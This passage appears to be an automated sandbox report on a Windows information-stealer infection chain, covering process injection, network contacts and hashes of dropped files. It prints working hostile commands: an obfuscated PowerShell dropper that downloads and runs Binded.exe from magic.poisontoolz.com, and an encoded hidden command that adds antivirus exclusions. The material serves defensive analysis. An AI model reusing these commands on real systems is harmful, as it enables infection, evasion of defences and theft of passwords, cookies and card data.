Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2560 wrote to memory of 3844 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3844 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Binded.exe
PID 3844 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Binded.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\blbrok.exe
PID 2908 wrote to memory of 456 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\rock.exe
PID 2908 wrote to memory of 456 N/A C:\Users\Admin\AppData\Roaming\Binded.exe C:\Users\Admin\AppData\Local\Temp\rock.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3756 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
PID 3200 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\wqjqot.exe C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ckCYMarg($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs){[IO.File]::WriteAllBytes($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs)};function WypStgKENDEIcA($ZMHRISzDhdwdY){if($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58153,58161,58161))) -eq $True){rundll32.exe $ZMHRISzDhdwdY }elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58165,58168,58102))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZMHRISzDhdwdY}elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58162,58168,58158))) -eq $True){misexec /qn /i $ZMHRISzDhdwdY}else{Start-Process $ZMHRISzDhdwdY}};function TXuAgVFpQG($hindkrPqZcNyrlU){$RgafzCFGvzVmJX = New-Object (FPFknBqQsu @(58131,58154,58169,58099,58140,58154,58151,58120,58161,58158,58154,58163,58169));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aumfRHUmZgmLSBs = $RgafzCFGvzVmJX.DownloadData($hindkrPqZcNyrlU);return $aumfRHUmZgmLSBs};function FPFknBqQsu($rxPrWTWbbzv){$lzrQhUf=58053;$IgPoeJQDbcreOFG=$Null;foreach($SheyHVSxpFbk in $rxPrWTWbbzv){$IgPoeJQDbcreOFG+=[char]($SheyHVSxpFbk-$lzrQhUf)};return $IgPoeJQDbcreOFG};function OCOpOfqedID(){$SFaTrukxkqfhJljN = $env:AppData + '\';$AHqkDmXF = $SFaTrukxkqfhJljN + 'Binded.exe'; if (Test-Path -Path $AHqkDmXF){WypStgKENDEIcA $AHqkDmXF;}Else{ $jiPMwkwJERZcU = TXuAgVFpQG (FPFknBqQsu @(58157,58169,58169,58165,58168,58111,58100,58100,58162,58150,58156,58158,58152,58099,58165,58164,58158,58168,58164,58163,58169,58164,58164,58161,58175,58099,58152,58164,58162,58100,58119,58158,58163,58153,58154,58153,58099,58154,58173,58154));ckCYMarg $AHqkDmXF $jiPMwkwJERZcU;WypStgKENDEIcA $AHqkDmXF;};;;;}OCOpOfqedID;

C:\Users\Admin\AppData\Roaming\Binded.exe

"C:\Users\Admin\AppData\Roaming\Binded.exe"

C:\Users\Admin\AppData\Local\Temp\rock.exe

"C:\Users\Admin\AppData\Local\Temp\rock.exe"

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 138.91.171.81:80 tcp
NL 52.142.223.178:80 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
NL 149.154.167.220:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.140.118.28:443 tcp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 52.140.118.28:443 tcp
N/A 52.140.118.28:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.3.187.198:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 104.77.160.23:80 tcp
US 8.8.8.8:53 udp
N/A 194.33.191.53:58001 tcp
US 8.8.8.8:53 udp
GB 96.17.179.12:80 tcp
N/A 194.33.191.53:58001 tcp

Files

memory/3844-3-0x00000000048C0000-0x00000000048D0000-memory.dmp

memory/3844-4-0x0000000004F00000-0x0000000005528000-memory.dmp

memory/3844-2-0x00000000048C0000-0x00000000048D0000-memory.dmp

memory/3844-5-0x0000000004CE0000-0x0000000004D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwysozym.tol.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3844-16-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/3844-6-0x00000000055D0000-0x0000000005636000-memory.dmp

memory/3844-1-0x0000000071ED0000-0x0000000072680000-memory.dmp

memory/3844-0-0x0000000004700000-0x0000000004736000-memory.dmp

memory/3844-17-0x00000000057E0000-0x0000000005B34000-memory.dmp

memory/3844-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp

memory/3844-18-0x0000000005C80000-0x0000000005C9E000-memory.dmp

memory/3844-22-0x0000000006230000-0x0000000006252000-memory.dmp

memory/3844-23-0x00000000072B0000-0x0000000007854000-memory.dmp

memory/3844-21-0x00000000061C0000-0x00000000061DA000-memory.dmp

memory/3844-20-0x0000000006C60000-0x0000000006CF6000-memory.dmp

memory/3844-24-0x0000000007EE0000-0x000000000855A000-memory.dmp

memory/2908-39-0x0000000000D80000-0x00000000012F2000-memory.dmp

memory/2908-40-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/2908-41-0x000000001BFE0000-0x000000001BFF0000-memory.dmp

memory/3844-38-0x0000000071ED0000-0x0000000072680000-memory.dmp

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 e447ce4e0dd50659d1ed5328ae95c742
SHA1 279e5fe69fdd32158117c272c0ac206b4a393896
SHA256 3b6bf86b11ea507fbb214c9ed26210d25f48656b03a7d56134ce63e49c388e41
SHA512 7064301eac7ab2e2d2a9cd2d12c0ab236585de5f2d7476b51e00180f7f7de65736a4abfbfbec568768963deea1753b3011a09d50e5a24e3c00a36f840241b86d

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 8bf787cd1198e3127190462262c66af7
SHA1 c3bd6e1278ef871d0804512f3dc27ab8673027f9
SHA256 efeb073272216decf23b6885215f4cb16a68c631c0054ba411fc32757f1df130
SHA512 7f0cf90bd61456f331f078eaf20e91940ab2146aa5905b64ee06dc91bcb07a7da74c864996421942b4f0dd51055f805cc9add964a2136a1b8f2fec6dee982266

C:\Users\Admin\AppData\Roaming\Binded.exe

MD5 09379b3c4a2c8d7e740d9418deea490a
SHA1 305cdfded9fb5a12904fb2712d2f2a989f6814a2
SHA256 7833cadca8b516636500eaac8479e6644c06af9dbbd5cd613a2276ba34ac03a1
SHA512 116d6d6127b0d32a10ec5ea09d37c627c188727ea3e1df609c8a31e3c332fc56b877d7492ce001c58821c25ccb3d9dd62fbf8cd67e28fb1b27810fbbb29a63ab

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 03bfe4f50a77d2467b47614d34c42fb6
SHA1 4e3ab73980dc220bdc9c207788f199b572d488b5
SHA256 2072b19de24e8246be2422ba3122cfef2e11e4bcc3ef46bfce22b886f6e168f3
SHA512 338fb3ddd309b81bad5af5dbc7f2c60080124736a10d5dee76dba36c2730f20842f69a7e347b82a3285e7b4b937c1688a5064061f5cc02fcb03c2180112a524e

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 2af26422ada303194e29a808560b21bf
SHA1 eefb4a2823d85c20862754950027bf316e898310
SHA256 46c6fa4a583cf1a287fc09f9bf57bc8e91d817559de7f5c9ce5194a1d32bcc9e
SHA512 1bbdf1d604ba208f000906722045dd0e3c5aa1655c22e0979d9d4eba41e4bb1c21fcbcef1aeba49f8f9109764d71b2dde2813672fddda2c85784d3bcfdbf435d

memory/3972-72-0x0000000004CE0000-0x0000000004CF0000-memory.dmp

memory/3972-81-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-87-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-95-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-99-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-101-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-103-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-104-0x000001C442E70000-0x000001C442E80000-memory.dmp

memory/3972-108-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-106-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-113-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-115-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-111-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-97-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-93-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-91-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-89-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-85-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-121-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-131-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-143-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-141-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-139-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-137-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-135-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-133-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-129-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-127-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-125-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-123-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-119-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-117-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-83-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-288-0x000001C442E80000-0x000001C442ED0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Passwords.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

memory/3972-79-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/456-78-0x000001C4285A0000-0x000001C428718000-memory.dmp

memory/2908-77-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/456-76-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/3972-75-0x0000000004BE0000-0x0000000004CC2000-memory.dmp

memory/3972-73-0x0000000004BE0000-0x0000000004CC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rock.exe

MD5 55c1e65b9e7ac557b4c076d1b06e975a
SHA1 66bff0bd3d9a0acd309d2cc345ef20cf0983ce24
SHA256 0c5834d8e470877274399911bf41aca8dfe1b78c56b2eef989ae6dda2eb99ddb
SHA512 1842ef859e86f99b8fc7cf41b7f79d39ef33d9dccb630c1a6b9ddf1723d35905b73a8ae2971554bdd9ccf3a8517f32c08209e45bca842ca519312276c274c7ba

memory/3972-67-0x0000000000350000-0x00000000003EC000-memory.dmp

memory/3972-69-0x0000000074E00000-0x00000000755B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 f9b52117a18922a656813c19c900e1a0
SHA1 5799c4228d6567a1335e338f15c4912eeef0a2a2
SHA256 7b60894783f90113c994ca42f60ec47db34e7e99aa01de2e2f7e03b840db304a
SHA512 e7377913c9215fdd2b1be050f225defcd3182b4b9a5a0d4ff2ddb1e6ecc84ee20dfea58fca514819a0206deec8f3ea1ef64c2598b68869f0218ab9cae0c4f921

C:\Users\Admin\AppData\Local\Temp\blbrok.exe

MD5 f189e88b77130e0dbef360901a49b75f
SHA1 4889b7a7907d01653e9030e282d00ad637249061
SHA256 326ad5539723ddc92995ae4f22ad0d99f8202c7d759d7c65e8204f2303fedd94
SHA512 db3138ed6f472f52e7e52fce37b4808b27eaa83d5f4d3fbc1bdc8149d2ded7c9a1e3e6bf9bb00fe60a654884d54da0cadfb6fe18cabb972316fb31bd35930f8a

memory/456-809-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp

memory/3972-2327-0x0000000004E00000-0x0000000004E4C000-memory.dmp

memory/3972-2326-0x0000000004D20000-0x0000000004D76000-memory.dmp

memory/3972-2328-0x0000000005100000-0x0000000005154000-memory.dmp

memory/3972-2331-0x0000000074E00000-0x00000000755B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f0703cbb7d230784f16f051935e13267
SHA1 ea7120074ca0bd261431e4de812eb853748bf3fb
SHA256 d1eb588b0f67f2f65a69dd3152f9351db6746be59c83d55f104bf31b8f8abf42
SHA512 6002a89265a2b33c1c1e51859e2df65a6d207a235c4e17c039362b7d95cafc217a151d5386be42caafe71b24150687001db464f28cdbeaab28dec2468865ce6c

memory/4704-2340-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp

memory/4704-2339-0x000001E97C9C0000-0x000001E97C9D0000-memory.dmp

memory/4704-2348-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp

memory/4704-2338-0x00007FFEA6000000-0x00007FFEA6AC1000-memory.dmp

memory/4704-2337-0x000001E97EAB0000-0x000001E97EAD2000-memory.dmp

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

MD5 0e103855aba5d5d4e78d92694c113cec
SHA1 f77845a6b5793f276c904de52b03634bfbeea6ae
SHA256 5713320a6d17f3c597e2dda9ace84f51faa3570323f1ba02a30baa62f07013c0
SHA512 9521451b24d5654dd2f11257530bfc116645b7e123a5f55f20f7123707a5e05603f919989a9ddd2f73abe91d22fed434080b509bab15cebdb495006bee476eef

memory/3756-2352-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/3756-2351-0x0000000074E00000-0x00000000755B0000-memory.dmp

C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe

MD5 00e55127fe6b8edb0071c2a557fab93c
SHA1 0f9017dcbf0939a341bf4a5f4040fa02dc4affb4
SHA256 c6631aee4cc4e511bd16289e1abf3cef7668d63d5e0467acf7e22dafcf18caa2
SHA512 81e53ae890f520e247ba477bc173e669cef49d9c73ccd2d16695120aee8face53d4f4b3adb79950a7b3bfcd59ebfe1830db33e47e00322ee7d3f800fcab7666b

memory/5004-4559-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/5004-4560-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/3756-4589-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/4760-6264-0x0000021273120000-0x0000021273130000-memory.dmp

memory/4760-6262-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4760-6780-0x00007FFEA6120000-0x00007FFEA6BE1000-memory.dmp

memory/3200-6785-0x0000000000F30000-0x0000000000F4C000-memory.dmp

memory/3200-6787-0x00000000058A0000-0x00000000058B0000-memory.dmp

memory/3200-6786-0x0000000074E00000-0x00000000755B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

MD5 f3ed43acd7d035e8c6035c7d65ec60bf
SHA1 679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512 fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5

C:\Users\Admin\AppData\Local\Temp\wqjqot.exe

MD5 1a9ac8aa754a986cccb6580f1494b813
SHA1 3f99084894df1307c1cc22228d22e075d461344e
SHA256 c4c16b46ca26315f46e2fc97dd93646064c9c06098c0aecc1cf3851b4eb4d1b2
SHA512 4fdc5869fa38faf95200a70eb069b1ed6987c3085fbad4940b877eebc4b6a723c492ead79938d00843e86f4fc9c40a64c7d4ccd3ea64b7128b763c9300319b8f

memory/3200-6788-0x00000000062B0000-0x00000000063E6000-memory.dmp

memory/5004-7281-0x0000000004F80000-0x0000000004F90000-memory.dmp

memory/5004-7290-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/3200-7723-0x00000000063F0000-0x00000000063F1000-memory.dmp

memory/3200-7724-0x00000000064C0000-0x000000000658E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wqjqot.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/1924-7732-0x0000000005380000-0x0000000005412000-memory.dmp

memory/1924-7733-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/1924-7734-0x0000000006110000-0x000000000611A000-memory.dmp

memory/3200-7731-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/1924-7730-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/1924-7729-0x0000000000400000-0x0000000000578000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Cookies.txt

MD5 824ce7c07117a630e9b31638f89476aa
SHA1 2d012f1cd8b636de1662f69d213b3cf9fa5df846
SHA256 4d1a2351c6146b7f0cc87825160516933201af5e737028b360d4ee8d0ca7fdfd
SHA512 0c0d50920055b3a2343154acbe8e6d1a3490ce7ae403a21a9b385309805338ba05163500439ab85d30d1d2bb5c742009bb2b0c25d74533ba24780d31efe5c945

memory/1924-7735-0x0000000008A70000-0x0000000008AC0000-memory.dmp

memory/1924-7775-0x0000000074E00000-0x00000000755B0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\down.png

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
